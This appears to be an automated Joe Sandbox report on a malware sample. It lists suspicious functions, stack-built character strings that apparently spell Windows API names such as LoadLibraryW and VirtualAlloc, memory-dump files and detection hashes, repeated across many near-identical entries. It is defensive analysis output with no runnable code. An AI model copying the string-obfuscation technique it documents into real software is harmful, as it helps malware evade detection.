Download Yara Rule

Strings

s, xrefs: 004202BF
r, xrefs: 0042029C
c, xrefs: 004202AA
P, xrefs: 00420638
e, xrefs: 004202B1
CrashReport.dll, xrefs: 004113C9, 0041140A, 004202EF, 00420332
t, xrefs: 0042028E
x, xrefs: 00420280
i, xrefs: 00420287
E, xrefs: 00420279
o, xrefs: 004202A3
, xrefs: 0042168D
P, xrefs: 00420295
s, xrefs: 004202B8

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: $CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
API String ID: 0-3554693867
Opcode ID: 92791e5acdff3e757c73d881f3f959e0bb0047cf4c99e8acf9b54b6d7b4cea7b
Instruction ID: b374eaabb79de936333ede1a79ac467764561d116e4d67361b4f8f5c0d451191
Opcode Fuzzy Hash: 92791e5acdff3e757c73d881f3f959e0bb0047cf4c99e8acf9b54b6d7b4cea7b
Instruction Fuzzy Hash: 3932CDB1E052A88FEB20CB14DC84BEABBB5EF85310F0440FAD44DA6681D6795ED1CF56

Function 0041283C Relevance: 18.0, Strings: 14, Instructions: 518COMMON

Download Yara Rule

Strings

s, xrefs: 004202BF
r, xrefs: 0042029C
c, xrefs: 004202AA
P, xrefs: 00420638
e, xrefs: 004202B1
CrashReport.dll, xrefs: 004202EF, 00420332
t, xrefs: 0042028E
x, xrefs: 00420280
i, xrefs: 00420287
E, xrefs: 00420279
o, xrefs: 004202A3
, xrefs: 0042168D
P, xrefs: 00420295
s, xrefs: 004202B8

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: $CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
API String ID: 0-3554693867
Opcode ID: bbe065e44803fceb44910dd713dd737582de35f73896f6804351aca1609d64bb
Instruction ID: 6d92df309adc330b37f7ccbb712304135bdbf154322a6cc1afe4e9e412da2afb
Opcode Fuzzy Hash: bbe065e44803fceb44910dd713dd737582de35f73896f6804351aca1609d64bb
Instruction Fuzzy Hash: 5422F1B2D052689EFB208A24DC84BEAB7B5EF94314F0441FAD80CA6681D37D5FC58F56

Function 004115FF Relevance: 17.9, Strings: 14, Instructions: 387COMMON

Download Yara Rule

Strings

s, xrefs: 004202BF
r, xrefs: 0042029C
c, xrefs: 004202AA
P, xrefs: 00420638
e, xrefs: 004202B1
CrashReport.dll, xrefs: 004202EF, 00420332
t, xrefs: 0042028E
x, xrefs: 00420280
i, xrefs: 00420287
E, xrefs: 00420279
o, xrefs: 004202A3
, xrefs: 0042168D
P, xrefs: 00420295
s, xrefs: 004202B8

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: $CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
API String ID: 0-3554693867
Opcode ID: 744cc4be7af199925ff2400368d6faff0f298ef3f559dc497374b01bc8693a28
Instruction ID: b777e03e1ff9027aab8287b092330222c2e06b0e9a0eb9320e96fc7dcddcd604
Opcode Fuzzy Hash: 744cc4be7af199925ff2400368d6faff0f298ef3f559dc497374b01bc8693a28
Instruction Fuzzy Hash: C4E114B2E052A88EF7208B24DC547EABBB5AF81300F0440FAD44DA6682D27D5FC5CF56

Function 0040D06A Relevance: 17.9, Strings: 14, Instructions: 355COMMON

Download Yara Rule

Strings

s, xrefs: 004202BF
r, xrefs: 0042029C
c, xrefs: 004202AA
P, xrefs: 00420638
e, xrefs: 004202B1
CrashReport.dll, xrefs: 004202EF, 00420332
t, xrefs: 0042028E
x, xrefs: 00420280
i, xrefs: 00420287
E, xrefs: 00420279
o, xrefs: 004202A3
, xrefs: 0042168D
P, xrefs: 00420295
s, xrefs: 004202B8

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: $CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
API String ID: 0-3554693867
Opcode ID: be219dd7f13311e99511de0df5be5d7edb0f8e86acdab6bb2455d25a9b62af51
Instruction ID: d3191a14ae294c17c8aa18af4c61d959c4f513952d03b2b312e665a9f1501eea
Opcode Fuzzy Hash: be219dd7f13311e99511de0df5be5d7edb0f8e86acdab6bb2455d25a9b62af51
Instruction Fuzzy Hash: 40D124B2E092A49EF720CA24DC44BEABBB5EF91314F0440FAD44CA6281D67D5FC58F52

Function 00410055 Relevance: 17.8, Strings: 14, Instructions: 345COMMON

Download Yara Rule

Strings

a, xrefs: 00411014
d, xrefs: 0041101B
o, xrefs: 0041100D
a, xrefs: 0041103E
i, xrefs: 00411029
L, xrefs: 00411022
r, xrefs: 00411037
CrashReport.dll, xrefs: 00410FD5
y, xrefs: 0041104C
W, xrefs: 00411053
L, xrefs: 00411006
b, xrefs: 00411030
r, xrefs: 00411045
CGB>, xrefs: 004110AB

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: CGB>$CrashReport.dll$L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 0-2874655421
Opcode ID: 634296a12868fe64c444dd1a69aa1a87964b2178c4ef8a4b1c10bf87dd00030f
Instruction ID: 28573b431104de714659e14005bc12ea8d4cedfd95a2f1439b6d5c9cc77b15a0
Opcode Fuzzy Hash: 634296a12868fe64c444dd1a69aa1a87964b2178c4ef8a4b1c10bf87dd00030f
Instruction Fuzzy Hash: E9E1EF70D052688BEB60CB14CC90BEAB7B6EF85304F1481EAD80CA7342DA795ED5CF56

Function 00410230 Relevance: 17.8, Strings: 14, Instructions: 337COMMON

Download Yara Rule

Strings

a, xrefs: 00411014
d, xrefs: 0041101B
o, xrefs: 0041100D
a, xrefs: 0041103E
i, xrefs: 00411029
L, xrefs: 00411022
r, xrefs: 00411037
CrashReport.dll, xrefs: 00410FD5
y, xrefs: 0041104C
W, xrefs: 00411053
L, xrefs: 00411006
b, xrefs: 00411030
r, xrefs: 00411045
CGB>, xrefs: 004110AB

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: CGB>$CrashReport.dll$L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 0-2874655421
Opcode ID: ef59bf22e05791a33724f3ed629b16e6f991e9f2a5fdbdc59e71daa04ad1fb63
Instruction ID: 15585694ee10a1af81d3344b63c63003f30c9683754b990a81afad693c7aaae2
Opcode Fuzzy Hash: ef59bf22e05791a33724f3ed629b16e6f991e9f2a5fdbdc59e71daa04ad1fb63
Instruction Fuzzy Hash: BAD13471D082A89BE720CB24DC94BEB7B75EF82304F1480FAD84C96642D6795EC6CF56

Function 0040D0DB Relevance: 17.8, Strings: 14, Instructions: 327COMMON

Download Yara Rule

Strings

s, xrefs: 004202BF
r, xrefs: 0042029C
c, xrefs: 004202AA
P, xrefs: 00420638
e, xrefs: 004202B1
CrashReport.dll, xrefs: 004202EF, 00420332
t, xrefs: 0042028E
x, xrefs: 00420280
i, xrefs: 00420287
E, xrefs: 00420279
o, xrefs: 004202A3
, xrefs: 0042168D
P, xrefs: 00420295
s, xrefs: 004202B8

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: $CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
API String ID: 0-3554693867
Opcode ID: 3e687aa2084c0c1e31af9bafc7465906a81b65fff666aa7b8fa1ebea60af9741
Instruction ID: 47cc05ef796833f20df94715e44a6815e7c221e648a2fdcf374f96af28a36b8d
Opcode Fuzzy Hash: 3e687aa2084c0c1e31af9bafc7465906a81b65fff666aa7b8fa1ebea60af9741
Instruction Fuzzy Hash: 57D115B2E052A49EF720CA24DC447EABAB5EF91310F0440FAD44CA7681C67D5FC58F66

Function 004145A6 Relevance: 17.8, Strings: 14, Instructions: 323COMMON

Download Yara Rule

Strings

s, xrefs: 004202BF
r, xrefs: 0042029C
c, xrefs: 004202AA
P, xrefs: 00420638
e, xrefs: 004202B1
CrashReport.dll, xrefs: 004202EF, 00420332
t, xrefs: 0042028E
x, xrefs: 00420280
i, xrefs: 00420287
E, xrefs: 00420279
o, xrefs: 004202A3
, xrefs: 0042168D
P, xrefs: 00420295
s, xrefs: 004202B8

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: $CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
API String ID: 0-3554693867
Opcode ID: 1cd384cfedf5098ace8ea5216cae827cfe3210be41f4b8d5cb514916e501c877
Instruction ID: 2ed12cd81298c9345680a260f68604c3c016c5ff2124f8e24448ea315dcded80
Opcode Fuzzy Hash: 1cd384cfedf5098ace8ea5216cae827cfe3210be41f4b8d5cb514916e501c877
Instruction Fuzzy Hash: 0ED1C0B1E052A88EEB20CA24DC547EABBB1EF51304F1440FAD84CAA681D67D5FC5CF56

Function 0041021F Relevance: 17.8, Strings: 14, Instructions: 306COMMON

Download Yara Rule

Strings

a, xrefs: 00411014
d, xrefs: 0041101B
o, xrefs: 0041100D
a, xrefs: 0041103E
i, xrefs: 00411029
L, xrefs: 00411022
r, xrefs: 00411037
CrashReport.dll, xrefs: 00410FD5
y, xrefs: 0041104C
W, xrefs: 00411053
L, xrefs: 00411006
b, xrefs: 00411030
r, xrefs: 00411045
CGB>, xrefs: 004110AB

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: CGB>$CrashReport.dll$L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 0-2874655421
Opcode ID: 706b7ac295f89db17e70667ec3c733dcfd7490300e0e2b5d44a24442ab6ae808
Instruction ID: 92f5c4d632993d2955ae432ad90fb1a8f41d132a6a9c79ee99be0bf5b94c74d7
Opcode Fuzzy Hash: 706b7ac295f89db17e70667ec3c733dcfd7490300e0e2b5d44a24442ab6ae808
Instruction Fuzzy Hash: 5FC12371D092689AEB20CB24DC94BEB7BB5EF82304F1480FAD80C97642D6795EC5CF56

Function 00410301 Relevance: 17.8, Strings: 14, Instructions: 297COMMON

Download Yara Rule

Strings

a, xrefs: 00411014
d, xrefs: 0041101B
o, xrefs: 0041100D
a, xrefs: 0041103E
i, xrefs: 00411029
L, xrefs: 00411022
r, xrefs: 00411037
CrashReport.dll, xrefs: 00410FD5
y, xrefs: 0041104C
W, xrefs: 00411053
L, xrefs: 00411006
b, xrefs: 00411030
r, xrefs: 00411045
CGB>, xrefs: 004110AB

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: CGB>$CrashReport.dll$L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 0-2874655421
Opcode ID: 8e8d9158ca9b8abab3a3b774b4b52a3f924db1011733c6d65a5399ab46df8f72
Instruction ID: 2b818438b28575bd9d6757f77d77d774293a2b07f6e30c91a71e44f65a72ce33
Opcode Fuzzy Hash: 8e8d9158ca9b8abab3a3b774b4b52a3f924db1011733c6d65a5399ab46df8f72
Instruction Fuzzy Hash: B9B144B1D082989BE7208B24DC44BEA7B75EF81304F1481FAD84D96282D6BD4EC6CF56

Function 0040B062 Relevance: 17.8, Strings: 14, Instructions: 278COMMON

Download Yara Rule

Strings

s, xrefs: 004202BF
r, xrefs: 0042029C
c, xrefs: 004202AA
P, xrefs: 00420638
e, xrefs: 004202B1
CrashReport.dll, xrefs: 004202EF, 00420332
t, xrefs: 0042028E
x, xrefs: 00420280
i, xrefs: 00420287
E, xrefs: 00420279
o, xrefs: 004202A3
, xrefs: 0042168D
P, xrefs: 00420295
s, xrefs: 004202B8

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: $CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
API String ID: 0-3554693867
Opcode ID: c9eb97d3eb7d0c4b4e6446be02efb25f828959335c468297e0798882637d55fe
Instruction ID: 2bc6a2c49ea06131b3c2d7033028ff7d0102a85d8019d47b32f5477480dfbe32
Opcode Fuzzy Hash: c9eb97d3eb7d0c4b4e6446be02efb25f828959335c468297e0798882637d55fe
Instruction Fuzzy Hash: 87B1D2B1E052A49EFB20CA24DC547EABAB5EF51310F0440FAD44CAB681C77D5FC58BA6

Function 0041C0CB Relevance: 17.8, Strings: 14, Instructions: 271COMMON

Download Yara Rule

Strings

l, xrefs: 0041C45B
J28;, xrefs: 0041C40E
V, xrefs: 0041C423
l, xrefs: 0041C462
A, xrefs: 0041C454
c, xrefs: 0041C470
r, xrefs: 0041C431
l, xrefs: 0041C44D
t, xrefs: 0041C438
o, xrefs: 0041C469
a, xrefs: 0041C446
_R, xrefs: 0041C801
i, xrefs: 0041C42A
u, xrefs: 0041C43F

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: A$J28;$V$_R$a$c$i$l$l$l$o$r$t$u
API String ID: 0-4041529859
Opcode ID: c7450f78a140988aafbe20effae2c912bb7a2aeda3910e8f9251d5a6e1c219e1
Instruction ID: 003180d38f77cc8803a351203a56c8e9cbafbc388e8f12235da44feb45b75d57
Opcode Fuzzy Hash: c7450f78a140988aafbe20effae2c912bb7a2aeda3910e8f9251d5a6e1c219e1
Instruction Fuzzy Hash: 03A1F2B1D082648EF7208B24DC84BEA7BB5EF81314F1480FED44D97682D6795FC18B66

Function 0041C137 Relevance: 17.7, Strings: 14, Instructions: 242COMMON

Download Yara Rule

Strings

l, xrefs: 0041C45B
J28;, xrefs: 0041C40E
V, xrefs: 0041C423
l, xrefs: 0041C462
A, xrefs: 0041C454
c, xrefs: 0041C470
r, xrefs: 0041C431
l, xrefs: 0041C44D
t, xrefs: 0041C438
o, xrefs: 0041C469
a, xrefs: 0041C446
_R, xrefs: 0041C801
i, xrefs: 0041C42A
u, xrefs: 0041C43F

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: A$J28;$V$_R$a$c$i$l$l$l$o$r$t$u
API String ID: 0-4041529859
Opcode ID: 48a71ff226f7c8b23cdaa05fc023dd6ca970369c303e6648c1c65ee50e03d9b4
Instruction ID: 4232c71923d7ff96c5d4261595b4d506814e236fc931062ee2a06c6d669e28f4
Opcode Fuzzy Hash: 48a71ff226f7c8b23cdaa05fc023dd6ca970369c303e6648c1c65ee50e03d9b4
Instruction Fuzzy Hash: DF91C271E082648EF7208B24DC94BEA7BB5EF91314F1440FAD44D9B282D7795FC18B66

Function 0041C23F Relevance: 17.7, Strings: 14, Instructions: 237COMMON

Download Yara Rule

Strings

l, xrefs: 0041C45B
J28;, xrefs: 0041C40E
V, xrefs: 0041C423
l, xrefs: 0041C462
A, xrefs: 0041C454
c, xrefs: 0041C470
r, xrefs: 0041C431
l, xrefs: 0041C44D
t, xrefs: 0041C438
o, xrefs: 0041C469
a, xrefs: 0041C446
_R, xrefs: 0041C801
i, xrefs: 0041C42A
u, xrefs: 0041C43F

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: A$J28;$V$_R$a$c$i$l$l$l$o$r$t$u
API String ID: 0-4041529859
Opcode ID: 51a5462b0a0d234f005479872fe2b4ef8c0471cf4fb9cf407325ce1734e3bd93
Instruction ID: e0eb7f884e8821d0944b33b22deaa3c5efca6b21bc5b3fbf50a19b8caf8ce7c4
Opcode Fuzzy Hash: 51a5462b0a0d234f005479872fe2b4ef8c0471cf4fb9cf407325ce1734e3bd93
Instruction Fuzzy Hash: 959114B1E082A48EE7208625DC94BEA7BB5EF91314F1480FAD48D97281D6794FC1CB67

Function 0041C223 Relevance: 17.7, Strings: 14, Instructions: 233COMMON

Download Yara Rule

Strings

l, xrefs: 0041C45B
J28;, xrefs: 0041C40E
V, xrefs: 0041C423
l, xrefs: 0041C462
A, xrefs: 0041C454
c, xrefs: 0041C470
r, xrefs: 0041C431
l, xrefs: 0041C44D
t, xrefs: 0041C438
o, xrefs: 0041C469
a, xrefs: 0041C446
_R, xrefs: 0041C801
i, xrefs: 0041C42A
u, xrefs: 0041C43F

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
